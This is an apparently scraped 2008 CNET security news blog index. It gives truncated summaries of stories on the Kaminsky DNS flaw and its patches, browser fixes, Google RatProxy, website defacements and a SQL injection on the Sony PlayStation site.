ie8 fix
Ad: Canon Puts Efficiency On Press
ie8 fix

Defense in Depth

Researcher offers insight into DNS flaw

On Tuesday, security researcher Dan Kaminsky of IO Active calmly explained in a conference call with security reporters how he first stumbled upon a recently.

What he did next is remarkable: he waited. Instead of selling the vulnerability to a company like TippingPoint through its program , wherein the company would then handle the vendor contact and resolution, Kaminsky took the responsible step of contacting the most affected vendors himself. He discussed with them how best to address the flaw that resides at the most fundamental level of how the DNS currently works.

Together, Kaminsky and the vendors set a date more

Cisco releases its DNS patches

Following a security researcher's announcement of a massive, multivendor patch release, Cisco on Tuesday issued a patch for its products vulnerable to DNS cache-poisoning attacks.

In an , Cisco cited its IOS software, Network Registrar, Application and Content Networking System, and Global Site Selector used in combination with Cisco Network Registrar among those directly affected by the vulnerability announcement.

Earlier Tuesday, Microsoft released its patch for the same DNS vulnerability.

Massive, coordinated DNS patch released

A security researcher has responsibly disclosed a fundamental flaw within the Domain Name System (DNS), the addressing scheme behind the common names used on the Internet. Currently, it may be possible to guess these transaction ID values in advance and assert a malicious server as the authoritative DNS server for a popular bank or e-commerce site. The news was announced Tuesday.

Dan Kaminsky, director of penetration testing services for IO Active, found the DNS flaw earlier this year. Rather than sell the vulnerability, as some researchers have done, Kaminsky decided instead to gather the affected parties and discuss it with more

Microsoft fixes 9 flaws with 4 patches; none critical

Microsoft today released its or via the individual bulletins detailed below.

Entitled "Vulnerabilities in DNS Could Allow Spoofing (953230)," this bulletin is for users of Windows 2000, Windows XP, and Windows Server 2003; not affected are users of Windows Vista (both 32-bit and 64-bit editions) and Windows Server 2008. The update addresses vulnerabilities detailed in CVE-2008-1447 and CVE-2008-1454. The patch modifies the Windows Domain Name System (DNS) in Windows. Microsoft says these two vulnerabilities exist in both the DNS client and DNS server and could allow a remote attacker to redirect network traffic intended for systems on the Internet to more

Researcher faults Apple iPhone on security updates

A leading Mac OS X researcher says Apple has not kept the iPhone operating system up to date with patches it has issued for the desktop.

The iPhone runs a stripped-down version of Mac OS 10.5 and automatically checks for security updates. The last update for the phone, 1.1.4, was issued in February.

That means iPhone users are still vulnerable to a flaw discovered by Charlie Miller in March.

During the CanSecWest conference, Miller found and used a to win a $10,000 "Pwn to Own" contest. Apple patched Miller's Safari vulnerability for the desktop in more

Google RatProxy looks for cross-site flaws

Google released a free tool Tuesday that should help Web developers find and fix cross-site vulnerabilities.

The tool, , is described by Google as "a semi-automated, largely passive Web application security audit tool, optimized for an accurate and sensitive detection, and automatic annotation, of potential problems and security-relevant design patterns based on the observation of existing, user-initiated traffic in complex Web 2.0 environments."

The tool is versatile, detecting and ranking a broad class of vulnerabilities. Included are script injections, cross-site trust attacks, content-serving vulnerabilities, cross-site request forgeries (XSRF), and cross-site scripting (XSS).

RatProxy runs on Linux, FreeBSD, MacOS X, and more

Hundreds of Lithuanian Web sites defaced

Last weekend, several hundred Lithuanian Web sites were defaced with pro-Soviet and anti-Lithuanian slogans, according to .

Last Friday, Lithuanian government sites were warned of an impending Web attack and mounted appropriate defenses. Several hundred commercial sites did not do so and over the weekend took the brunt of the attack. By Monday, most all of the sites had been restored.

As with last year's Estonian denial-of-service attacks, the new attacks appear to be in reaction to a law outlawing the display of Soviet symbols in Lithuania. Germany has similar laws outlawing the display of Nazi symbols.

Early evidence suggests more

Mozilla and Opera fix security flaws

On Thursday, Opera released . The new version fixes a few security vulnerabilities and resolves some stability issues. One of the fixes addresses an arbitrary code execution vulnerability that was not previously made public.

Meanwhile, Mozilla released Firefox 2.0.15 with a , including a few remote-execution vulnerabilities.

Current Firefox 2 users should, however, upgrade to Firefox 3, which includes antimalware protection and other security features.

Four security bulletins expected on Patch Tuesday

for Patch Tuesday next week. The pre-announcement is intended as a heads up for IT departments before Patch Tuesday. All four are considered important, the second-most serious ranking by the software giant.

Among the important patches, two affect vulnerabilities within Windows, with one potentially causing remote code execution, while the other involves spoofing. Another bulletin affects Windows and Microsoft SQ Server and involves privilege elevation. The final bulletin affects Microsoft Exchange Server and also involves privilege elevation

Sony PlayStation site victim of SQL-injection attack

that some visitors to the Sony PlayStation site may have been prompted to download an antivirus scanner.

Pages promoting the PlayStation games SingStar Pop and God of War contained SQL-injected code. Visitors to those specific game pages would , then a message that their computer was infected with different viruses and Trojan horses. Warned, the user would then be asked to purchase the scanner to remove the bogus malware.

The injected code linking to the scanner has since been removed.

Sophos said the attack could have downloaded malicious payloads, but did not.

Security researcher . Over the last 90 days, Google reports more

ie8 fix
  • Recently Viewed Products
  • My Lists
  • My Software Updates
  • Promo
  • Log In | Join CNET